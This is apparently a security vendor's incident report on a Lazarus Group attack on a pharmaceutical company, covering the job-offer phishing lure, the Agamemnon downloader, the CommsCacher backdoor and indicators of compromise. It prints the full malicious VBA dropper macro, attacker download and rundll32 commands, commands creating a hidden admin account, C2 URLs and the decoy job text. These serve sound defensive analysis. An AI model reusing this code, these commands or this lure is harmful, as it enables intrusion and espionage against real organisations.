Contents

Introduction

At the end of September 2020, Positive Technologies Expert Security Center (PT Expert Security Center, PT ESC) was involved in the investigation of an incident in one of the largest pharmaceutical companies. After starting to analyze the tactics, techniques, and procedures (TTPs) of the attackers, the investigation team found similarities with the Lazarus Group attacks previously described in detail by cybersecurity experts in the reports Operation: Dream Job and "Operation (노스 스타) North Star A Job Offer That's Too Good to be True?".

This article describes a previously unknown attack by the APT group, reveals the Lazarus Group's TTPs that allowed attackers to obtain partial control over a pharmaceutical company's infrastructure in just four days, as well as the tools used by the attackers for preliminary compromise, network reconnaissance, and gaining persistence in the infrastructure of the targeted company.

At the end of the article, PT ESC provides a list of the group's TTPs and indicators of compromise that can be used by cybersecurity specialists to identify traces of the group's attacks and search for threats in their infrastructure.

1. Sequence of events

In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.

• C:\ProgramData\Applications\ZCacher.dat;
• C:\ProgramData\Applications\MemoryCompressor.tls-lbn;
• C:\ProgramData\Applications\MemoryCompressor.tls;
• C:\ProgramData\Applications\MemoryCompressor64.exe.

It was not possible to gain full access to all the files listed above during the incident investigation.

One of the compromised computers used CommsCacher, a backdoor named ApplicationCacher-f0182c1a4.rb (compilation date: 2020-09-14T16:21:41Z), and its configuration file C:\Users\*\AppData\Local\.IdentityService\AccountStore.bak encrypted with the VEST algorithm, as well as the LNK startup file C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSSqlite3Svc.lnk. Notably, the backdoor monitors RDP sessions on the compromised computer using WTSEnumerateSessionsW (see the Trojan-Backdoor CommsCacher section).

According to the proxy server logs, the compromised computers tried to connect to the address forecareer[.]com:443, which was not detected by antivirus engines as malicious at the time of the attack. According to WHOIS entries, the domain had been registered a few days before the attack began.

At the time of the attack, content was published on the domain that copied a page of the official website of General Dynamics Mission Systems, one of the world's largest manufacturers of military and aerospace equipment. The Lazarus Group had already used this brand in its attacks. The domain also had a valid SSL certificate.

At the beginning of the working week, both victims connected to the RDG server of one of the organization's branches from the compromised personal computers. This allowed attackers to gain access to the company's corporate network.

On the same day, the company's RDG server showed traces of illegitimate activity and evidence of malicious reconnaissance on the network for the first time. The compromised accounts, in particular, were used to run system utilities systeminfo.exe, ipconfig.exe, netstat.exe, tasklist.exe, qwinsta.exe, query.exe, quser.exe, net.exe, and ping.exe, as well as C:\ProgramData\Comms\Cacher.hls-iol (version of the public utility ADFind for Active Directory requests).

Later, CommsCacher with the name C:\ProgramData\USOShared\usomsqlite3.lgs.dat was also installed on the RDG server.

The attackers also uploaded an unknown PE file with the name C:\ProgramData\volitile.dat and launched the DLL library C:\ProgramData\comms\commspkg.bin (compilation date: 2020-08-22T18:45:25Z), which executes files transfered in the configuration via the command line using CreateProcessW. The library is protected by VMProtect.

  
powershell -Command (New-Object Net.WebClient).DownloadFile('http://192.168.129.92:8080/volitile.ico', 'C:\ProgramData\volitile.dat')
  

cmd.exe /c cmd.exe /c rundll32.exe c:\\programdata\\comms\\commspkg.bin,Serialize +JHzz8nMxMn+wvv+y/7z+MzCwsjz+MzCwsjPwMSN+/7L"

Two days later, after entering the corporate network, the attackers gained access to a number of servers, including the domain controller, additional RDG server, file server, and Crontab server. On these servers, the attackers also performed reconnaissance using system utilities and system services with the name usomgmt. The attackers used this name to name their own services on the compromised hosts:

cmd.exe /c cmd.exe /c C:\ProgramData\Microsoft\gpolicy.dat -f C:\ProgramData\Microsoft\gpolicy.out C:\ProgramData\Microsoft\gpolicy.bin 1q2w3e4r@#$@#$@#$

cmd.exe /c cmd.exe /c C:\ProgramData\Microsoft\gpolicy.dat 312 C:\ProgramData\Microsoft\gpolicy.bat

cmd.exe /c cmd.exe /c net user admin$ abcd1234!@#$ /add

cmd.exe /c cmd.exe /c net localgroup administrators admin$ /add

cmd.exe /c cmd.exe /c net localgroup -?-¦-+-+-+-+-?-?-?-¦-?-+-?-? admin$ /add

cmd.exe /c cmd.exe /c net user admin$ /delete >> C:\ProgramData\Microsoft\gpolicy.out

During incident investigation, the experts failed to gain access to files C:\ProgramData\Microsoft\gpolicy.dat, C:\ProgramData\Microsoft\gpolicy.out, C:\ProgramData\Microsoft\gpolicy.bin, and C:\ProgramData\Microsoft\gpolicy.bat. Tampering with creation, deletion, and addition of the user admin$ to the administrator group would later provoke the suspicion of the system administrators of the compromised company and serve as the beginning of the incident response.

Similar actions of attackers with the account admin$ were described in the report "Greetings from Lazarus."

At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.

https://mail.yandex.ru/?uid=*********#message/***************,Message "***, please add me to your LinkedIn network!" — Rob Wilson — Yandex.Mail,29.09.2020 12:54

https://mail.yandex.ru/?uid==*********#message/***************,Message «Rob sent you a new message» — Rob Wilson via LinkedIn — Yandex.Mail,29.09.2020 13:30

After studying the information about the job and the company through the Yandex search engine, Wikipedia and the legitimate website of General Dynamics UK, the employee continued to correspond with Rob Wilson's account, from whom they received links to download malicious documents GD20200909GAB31.doc, PDF20200920KLKA.pdf, and PDF20200920KLKA.zip from an attacker-controlled job search website clicktocareers[.]com, which was not detected by antivirus engines as malicious at the time of the attack.

Note that the victim failed to open the received PDF document the first time, after which the attackers sent her the InternalPDFViewer.exe software to view PDF files.

https://generaldynamics.uk.com/,Home - General Dynamics UK,29.09.2020 13:43,2,https://yandex.ru/search/?lr=16&text=%20General%20Dynamics%20UK%20Ltd%20

https://generaldynamics.uk.com/about/about-us/,About us - General Dynamics UK,29.09.2020 13:44
https://generaldynamics.uk.com/work/,Work with us - General Dynamics UK,29.09.2020 13:45
https://generaldynamics.uk.com/work/careers/,Careers - General Dynamics UK,29.09.2020 13:45

https://generaldynamics.uk.com/work/careers/project-management/,Project management - General Dynamics UK,29.09.2020 13:45

https://generaldynamics.uk.com/work/careers/current-vacancies/,Current vacancies - General Dynamics UK,29.09.2020 13:46

The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.

  
https://mail.clicktocareers[.]com/public/jobapplications/jdviewer.php?jd=10931  GD20200909GAB31.doc 29.09.2020 16:50:35
https://ru.wikipedia.org/wiki/General_Dynamics,General Dynamics — Википедия,29.09.2020 13:56,1,https://yandex.ru/search/?text=%20General%20Dynamics%20UK%20Ltd%20&lr=16
https://mail.clicktocareers[.]com/public/jobapplications/jdviewer.php?jd=12314  PDF20200920KLKA.ZIP 29.09.2020 17:04:01

https://mail.clicktocareers[.]com/public/jobapplications/jdviewer.php?jd=77234  PDF20200920KLKA.PDF 29.09.2020 17:06:11

https://generaldynamics.uk.com/systems/,See what we do - General Dynamics UK,29.09.2020 14:11

https://mail.yandex.ru/?uid=*********#message/***************,Письмо «Rob sent you a new message» — Rob Wilson через LinkedIn — Яндекс.Почта,29.09.2020 14:21

https://mail.yandex.ru/?uid=*********#message/***************,Письмо «Job Proposal at GDLS» — Rob Wilson — Яндекс.Почта,29.09.2020 16:50

https://mail.yandex.ru/?uid=*********#message/***************,Письмо «Re: Job Proposal at GDLS» — Rob Wilson — Яндекс.Почта,29.09.2020 17:03

  

Sensitive information has been replaced with asterisks (*).

On the compromised computer, the attackers performed reconnaissance using system commands query.exe, quser.exe, and netstat.exe and installed a CommsCacher backdoor named CommsCacher.dat, which gains persistence via an LNK file in the startup folder. The experts also discovered the evidence of launching the malicious DLL Trojan-Downloader Agamemnon regid.mdb (compilation date: 2020-09-14T16:21:26Z), which is extracted from a malicious document, then collects information from the infected host, sends it to the attackers' server, and in response receives a payload (see the Trojan-Downloader Agamemnon section). Command execution and network reconnaissance on the computer were carried out using the public utility SMBMAP designed for scanning SMB services.

2. Malicious document

The phishing document GD2020090939393903.doc contains a decoy text in the form of a job offer. The text of the document:

Senior Business Manager

Job Location: Washington, DC
Employment Type: Full Time
Clearance Level Must Currently Possess: None
Clearance Level Must Be Able to Obtain: None
Telecommuting Options: Some Telecommuting Allowed
Annual Salary: $72k - $120k


Job Description:

General Dynamics Mission Systems (GDMS) engineers a diverse portfolio of high technology solutions, products and services that enable customers to successfully execute missions across all domains of operation.
With a global team of 13,000+ top professionals, we partner with the best in industry to expand the bounds of innovation in the defense and scientific arenas.
Given the nature of our work and who we are, we value trust, honesty, alignment and transparency. We offer highly competitive benefits and pride ourselves in being a great place to work with a shared sense of purpose.
You will also enjoy a flexible work environment where contributions are recognized and rewarded. If who we are and what we do resonates with you, we invite you to join our high performance team!


Responsibilities:
Bachelor's degree in Senior Business Manager or a related specialized area or the equivalent experience is required plus a minimum of 10 years of relevant experience; or Master's degree plus a minimum of 8 years of relevant experience to meet managerial expectations.
The candidate must have proven experience with the capture management and proposal development processes.
Department of Defense TS/SCI security clearance is preferred at time of hire. Candidates must be able to obtain a TS/SCI clearance with polygraph within a reasonable amount of time from date of hire. Applicants selected will be subject to a U.S. Government security investigation and must meet eligibility requirements for access to classified information.
Due to the nature of work performed within our facilities, U.S. citizenship is required.
For foreign Candidates, they have to related in U.S with family.

Qualifications:
At General Dynamics Mission Systems (GDMS), we deliver systems that provide critical intelligence data to our national leadership.
As market leader and technology innovator, we are seeking talented professionals to deliver cutting edge solutions to our customers.
GDMS has an immediate opening for a Senior Manager of Business Development.
The selected candidate will work to identify and acquire new business ventures for GDMS and its customers.
The Senior Manager of Business Development will work among a talented and technically accomplished group of colleagues, and enjoy a flexible work environment where contributions are recognized and rewarded.


REPRESENTATIVE DUTIES AND TASKS:
The selected Senior Manager of Business Development:
Identifies and captures new business opportunities in the international and domestic Signals Intelligence (SIGINT) marketplace, with emphasis on High Frequency (HF) and Very High/Ultra High Frequency (V/UHF) Communications Intelligence (COMINT) Direction Finding (DF) Systems and Satellite Communication & Collection Systems;
Establishes and maintains frequent Intelligence Community (IC) and Defense customer contacts in the international and domestic SIGINT, COMINT/DF and Satellite Communication marketplace;
Collaborates with customers to develop system Concept of Operations (CONOPS), architectures, and requirements for SIGINT, COMINT/DF and Satellite Communication collection systems;
Develops and presents briefing packages of business area capabilities and system offerings to international and domestic customers;
Works closely with business area technical and management team to align business area strategy, capabilities, investments, and offerings with SIGINT, COMINT/DF and Satellite Communication markets;
Performs competitor analyses and develops teaming relationships as needed;
Works closely with Export Compliance organization to obtain all export licenses for business pursuits in the international marketplace.



Required Skills:
Minimum of five (5) years of project management related experience, with 2 years of experience as a Business Development Manager in a "large" or Government organization.
Experience coordinating and overseeing the implementation of security projects.
Experience with MS Project, SharePoint, or other project management tools.
Knowledge of general management and auditing techniques for identifying problems, gathering and analyzing pertinent information, forming conclusions, developing solutions and implementing plans consistent with management goals.
Excellent oral and written communication skills. Interaction and information gathering with coworkers and customers.


Education / Certifications:
Master's degree from an accredited higher education institution and a minimum of 11 years of progressive Business Development experience or equivalent experience.
One industry-recognized business development management certification.
Certifications relating to Government Clearance (a plus)



We are GDMS. The people supporting some of the most complex government, defense, and intelligence projects across the country. We deliver. Bringing the expertise needed to understand and advance critical missions. We transform. Shifting the ways clients invest in, integrate, and innovate technology solutions. We ensure today is safe and tomorrow is smarter. We are there. On the ground, beside our clients, in the lab, and everywhere in between. Offering the technology transformations, strategy, and mission services needed to get the job done. GDMS is an Equal Opportunity/Affirmative Action employer. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, sexual orientation, gender identity, national origin, disability, or veteran status, or any other protected class.
 

Some modifications of malicious documents obtained during the investigation were protected with the password JD-20BZ@9918261231C3 (presumably, to bypass security measures). Document metadata:

File Size                       : 1991 kB
File Permissions                : rwxrwx---
File Type                       : DOC
File Type Extension             : doc
MIME Type                       : application/msword
Title                           :
Subject                         :
Author                          : User
Keywords                        :
Comments                        :
Template                        : Normal
Last Modified By                : Admin
Revision Number                 : 2
Software                        : Microsoft Office Word
Total Edit Time                 : 2.0 minutes
Create Date                     : 2020:09:22 03:08:00
Modify Date                     : 2020:09:22 03:08:00
Pages                           : 4
Words                           : 870
Characters                      : 4960
Security                        : Password protected
Code Page                       : Windows Latin 1 (Western European)
Company                         :
Lines                           : 41
Paragraphs                      : 11
Char Count With Spaces          : 5819
App Version                     : 15.0000
Scale Crop                      : No
Links Up To Date                : No
Shared Doc                      : No
Hyperlinks Changed              : No
Title Of Parts                  :
Heading Pairs                   : Title, 1
Comp Obj User Type Len          : 32
Comp Obj User Type              : Microsoft Word 97-2003 Document

Analysis of the document showed that GD2020090939393903.doc contains a malicious VBA macro and a payload encoded using Base64 and XOR algorithms:

Attribute VB_Name = "NewMacros"
Private Function Base64Decode(base64 As String) As Variant
    Dim xmlDoc As Object
    Dim xmlNode As Object

    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")

    xmlNode.dataType = "bin.base64"
    xmlNode.Text = base64

    Base64Decode = xmlNode.nodeTypedValue

End Function
Private Function GetStringData(data As String) As String
    Dim decData As Variant
    Dim nLen As Long
    Dim strPath As String

    decData = Base64Decode(data)
    nLen = UBound(decData) - LBound(decData) + 1

    strPath = ""
    For inx = 0 To nLen - 1
        strPath = strPath & Chr((decData(inx) Xor 37) + 134 - 256)
    Next inx
    GetStringData = strPath
End Function
Private Function GetBufferData(data As String) As Variant
    Dim decData As Variant
    Dim nLen As Long

    decData = Base64Decode(data)
    nLen = UBound(decData) - LBound(decData) + 1

    For inx = 0 To nLen - 1
     If ((decData(inx) Xor 214) + 55) > 255 Then
        decData(inx) = (decData(inx) Xor 214) + 55 - 256
     Else
        decData(inx) = (decData(inx) Xor 214) + 55
     End If
    Next inx
    GetBufferData = decData
End Function
Sub AutoOpen()
'
' AutoOpen Macro
'
'
Dim strPath As String
Dim strArgment As String
Dim DataBuffer As Variant
Dim PBuffer() As Byte
Dim strObject As String

If ActiveDocument.Shapes.Count < 1 Then Exit Sub

strPath = GetStringData(ActiveDocument.Shapes("Text Box 3").TextFrame.TextRange.Text)
strArgment = GetStringData(ActiveDocument.Shapes("Text Box 4").TextFrame.TextRange.Text)
DataBuffer = GetBufferData(ActiveDocument.Shapes("Text Box 5").TextFrame.TextRange.Text)
nLen = UBound(DataBuffer) - LBound(DataBuffer) + 1
strObject = GetStringData(ActiveDocument.Shapes("Text Box 6").TextFrame.TextRange.Text)

    ReDim PBuffer(nLen)
    For inx = 0 To nLen - 1
        PBuffer(inx) = DataBuffer(inx)
    Next inx

    Open strPath For Binary Lock Write As #1
    Put #1, 1, PBuffer
    Close #1


    ActiveDocument.Shapes("Text Box 2").Select
    Selection.ShapeRange.TextFrame.TextRange.Select
    Selection.Collapse
    Selection.WholeStory
    Selection.Copy
    Selection.ShapeRange.Select
    Selection.MoveUp Unit:=wdScreen, Count:=1
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    Selection.PasteAndFormat (wdFormatOriginalFormatting)
    ActiveDocument.Save

    Set objShell = CreateObject(strObject)
    objShell.Run strArgment, 0, False
    Set objShell = Nothing
End Sub

Later, during threat hunting, the experts found similar documents:

Examples of decoy documents:

3. Trojan-Downloader Agamemnon

If successful, the malicious macro extracts the decrypted data to the file 963e8cfaa40226ba2e5d516464572446 in the directory C:\ProgramData\regid.mdb and runs the library with the following parameters:

 
rundll32.exe C:\ProgramData\regid.mdb,sqlite3_create_functionex X4BJOPK3O6nxwkVuK3HqqTt4 LRTB /QV3AcjAeAb/x3xH+0ZhyOBJfZXilGFS69N5E/rSe2z47XDp8uh37v2vZ6/zrkkg9KFobffsQyr5q0Urx6pxtP31eXHG8ER2xfd/t8/2SjjQeXOF8oR6guvDbIPownS85T1uOfD4YX7tv2T/4D5iMOnxaj3pfFW607td+9P6bGTTJVah2OBeptWnXOfeJl4o0elCtd10QLLZc1jz3PJEjNiNUAndiENOwM9WD9COUgDUgUiN1MxSSuXLYIvgCmwU7VVnEe5QbpbvV27X71ZrmPNZTmXMZFqiyuNLY8ViVFzLHUfZwJhB3tffRZ/4XngQ+FF1HfJcSVrJm0Ob95p9BPCFREHLwH8G9Yd5B/uGTYjxyW1V4tRgUuHTa5P6Un8s9W1+qf3oZ+7y73Dv8y52YMhheq3GbHKqw+tEq8DqfHTMNUqxxfB+ds43TLfL9kR4zzlrxeyEbcLuw3tD6wJkfOV9brniuGp+5j9nP+b+ZnDp8Wt96TxQ+um7UPviOlck3qVWIevga2bcp1kn2KZbKO4pTXXM9Fxy2/NbM9iyVAzVjVHJ10hWzs2PR4/TzmjA6sFazdkMYsrTC2OL40pclO4VZhHY0GRW71dpF+9Wa5jvmU1l3ORQYs6jW2PM4k8c1l1CWcDYRp7Nn0Tfxh5CEMnRSh30nEna9dt92/Iad0TNxXeB/kB5xvXHT4f7hmEI/IlQVe/UexLhk30T/5J/bOotYWng6HGu9+93b/Cud2DJYUTt+axz6sLrQ2vAqkP0wDVGcfgwSXbPN073/jZP+M+5csX8xG6C7YNqw+vCajzl/WG54HhmPuG/cL/yfmhw2HFU/dT8U7rRe2L71zpT5NclX+HZ YFRm7+dYZ9imQGjcKV313vRd8svzW/Pfsl8Mxc1QCd1IV87Xz1CPxg5TAOqBWg3XzFdKw==

Agamemnon is a legitimate SQLite DLL library with the malicious exported function sqlite3_create_functionex. This modification as well as the method of gaining persistence on a compromised computer in the startup folder were described in the report Operation (노스 스타) North Star A Job Offer That's Too Good to be True.

When launched, the extracted file regid.mdb collects the following information about the system:

• Computer name;
• Information about network adapters;
• User name;
• List of running processes.

Next, the malware compresses the received data using the LZ algorithm with the maximum compression ratio, after which it encrypts the data with its own algorithm and encodes it in Base64. The malware also generates a unique identifier for the infected host.

The collected information is sent to one of the attackers' C2 servers along with the computer ID. The full list of C2 servers is transmitted in encrypted form via the command line. The file GD2020090939393903.doc transmits the following list of C2 servers:

https://propro[.]jp/wp-content/documents/docsmgmt.php
http://www.ctevt.org[.]np/ctevt/public/frontend/review.php
http://gbflatinamerica[.]com/file/filelist.php
http://www.apars-surgery[.]org/bbs/bbs_files/board_blog/write.php
http://goldllama4.sakura.ne[.]jp/waterdo/wp/wp-content/plugins/view.php
https://bootcamp-coders.cnm[.]edu/~dmcdonald21/emoji-review/storage/app/humor.php

After sending the data to the C2 server, the malware receives a response from it. It contains the main payload also encrypted with its own algorithm. It is either executed in the process memory or uploaded to the hard disk at: %localappdata%\~DMF[0-9]{4}.tmp (the path is given in RegExp format) and launched using rundll32.exe. The version of payload execution is determined by the response of the C2 server.

Note that the loader is successfully detected in the public sandbox ANY.RUN.

4. Trojan-Backdoor CommsCacher

CommsCacher is also a legitimate SQLite DLL library with the malicious exported function sqlite3_create_functionex. Examples of LNK files with CommsCacher autorun parameters are shown below.

rundll32.exe CommsCacher.dat,sqlite3_create_functionex dbmanagementservice19253

rundll32.exe ApplicationCacher-f0182c1a4.rbs,sqlite3_create_functionex sqlite3msdbmgmtsvc-f810a

CommsCacher downloads and uploads configuration data to the hard disk in the file: %localappdata%\.IdentityService\AccountStore.bak. The configuration file is encrypted with the VEST encryption algorithm and contains a list of C2 servers. Example of the configuration data:

https://akramportal[.]org/delv/public/voice/voice.php
https://vega.mh-tec[.]jp/.well-known/gallery/siteview.php
https://www.hospitality-partners[.]co.jp/works/performance/consumer.php
https://inovecommerce[.]com.br/public/pdf/view.php

Connecting to one of the C2 servers, the sample receives shellcode and configuration data in response from the C2. The received data is decrypted and the shellcode with the transmitted parameters is launched. After that, the CommsCacher malware opens a named pipe \\.\pipe\fb4d1181bb09b484d058768598b, which is used to receive data from the shellcode and then transmit it to the C2 server.

The detected samples C:\ProgramData\Applications\ApplicationCacher-f0182c1a4.rbs (compilation date: 2020-09-24T05:12:24Z) and C:\ProgramData\USOShared\usomsqlite3.lgs.dat (compilation date: 2020-09-29T03:34:06Z) are similar to CommsCacher. The files contain 64 MB of random repeating characters. They could be used by the attackers to bypass antivirus protection that can ignore large files.

The backdoor functions and its server side were described in detail in the article Operation North Star: Behind The Scenes.

5. Logs of victims

During the incident investigation, a number of malicious C2 servers were identified, and, after studying them, the experts managed to obtain log files with the IP addresses of victims also compromised by this group. Log format: [JD = ID][Date] [Victim IP] [User-Agent].

The attacker-controlled servers contained files named sclient+[md5 victim]+.tmp or pagefile+[md5 victim]+.dat. These files contained information from compromised computers.

6. Attribution

The detected indicators of compromise belong to Lazarus Group, a hacker group also known as Hidden Cobra. The group has been operating since 2009 at least. Lazarus is thought to belong to a class of government-sponsored APT groups and come from North Korea. The group regularly conducts its attacks for the purpose of cyberespionage.

The main source vector of attacks is targeted phishing through third-party resources (Phishing: Spearphishing via Service). In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn, Telegram, WhatsApp, and corporate email.

Below is an example of correspondence between one of the victims and an attacker in the Telegram messenger. In this case, the attacker offered the victim to do a test assignment on the attacker-controlled server.

To attack the organization, the attackers created a phishing site of General Dynamics Mission Systems. As C2 servers, they used the resources of allegedly compromised organizations located in Brazil, France, Japan, South Korea, and the United States.

The group is characterized by the use of unique malicious software for remote command execution:

• The detected backdoor CommsCacher indicates a connection with the malicious company Dream Job and identifies the group of attackers as the Lazarus Group.
• The document GD2020090939393903.doc obtained during the investigation contains a malicious macro, an encrypted payload, and startup parameters that are stored in Text Box shapes, which coincides with the description of malicious documents that were described in the McAfee report.

The malicious campaign was also reported by researchers from IssueMakersLab:

7. Conclusions

To identify all compromised hosts and obtain detailed information about the incident, the experts scanned the entire company's infrastructure for indicators of compromise, as well as network and file signatures of users. All possible host artifacts were also analyzed. The most useful artifacts for restoring the incident chronology were the USN Journal, EVTX Events, Jump Lists, and the MFT table.

According to the investigation, the attackers did not gain access to sensitive information. As a result of the prompt actions of PT ESC specialists and administrators of the pharmaceutical company, the attackers were deprived of access to the controlled infrastructure.

Author: Aleksandr Grigorian, Positive Technologies

The article's author thanks the incident response and threat intelligence teams PT Expert Security Center for their help in drafting the story.

8. Similar malicious campaign

After investigating the incident, we continued to track the Lazarus Group and identified a new attack that has no direct connection to the case in question, but affects a similar geographical segment.

During this attack, in November 2020, attackers used a malicious document (GDLS47129481.docx 994c02f8c721254a959ed9bc823ab94b) with CVE-2017-0199. The attack was allegedly aimed at a company from Russia. The attack was also reported on the Anonymous Security Agency's Twitter account.

The document contained the following stub:

C2 server:

https://www.forecareer[.]com/gdcareer/officetemplate-20nab.asp?iqxml=480012756ad26f72e412db0ae7aa183e

The attackers used the domain from the previous campaign; however, the visual component of the phishing site was changed.

9. Verdicts of our products

PT Sandbox

• Backdoor.Win32.Regid.a

• Backdoor.Win64.CommsCacher.a

• Trojan.Win32.Generic.a

PT Network Attack Discovery

• LOADER [PTsecurity] Agamemnon
  sid: 10006234;10006237;10006238;

10. MITRE TTPs

11. IOCs